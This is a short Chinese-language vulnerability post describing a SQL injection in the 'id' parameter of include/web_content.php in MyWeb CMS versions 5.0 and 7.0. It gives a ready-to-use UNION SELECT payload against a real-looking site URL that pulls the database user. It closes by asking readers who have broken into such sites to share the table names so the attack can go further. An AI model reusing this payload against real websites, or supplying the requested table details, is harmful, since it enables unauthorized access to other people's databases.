影响版本:
MyWeb 5.0
MyWeb 7.0
漏洞描述:
在”include”目录下,文件web_content.php文件对变量Id提交的参数没有过滤,导致存在注入漏洞。
http://www.nuanyue.com/include/web_content.php?id=80 and 1=2 union select 1,2,concat(user()),4,5,6,7,8,9,10,11,12,13–
永久链接 : http://www.nuanyue.com/%e7%bd%91%e7%ab%99%e6%99%ba%e8%83%bd%e7%ae%a1%e7%90%86%e7%b3%bb%e7%bb%9fweb_content-php%e9%a1%b5%e9%9d%a2%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e.html

虽然有注入 但是 我碰到的一些站都是 4.0 的版本 猜不到表的 所以 如果你搞下过 知道表的 不妨告诉一下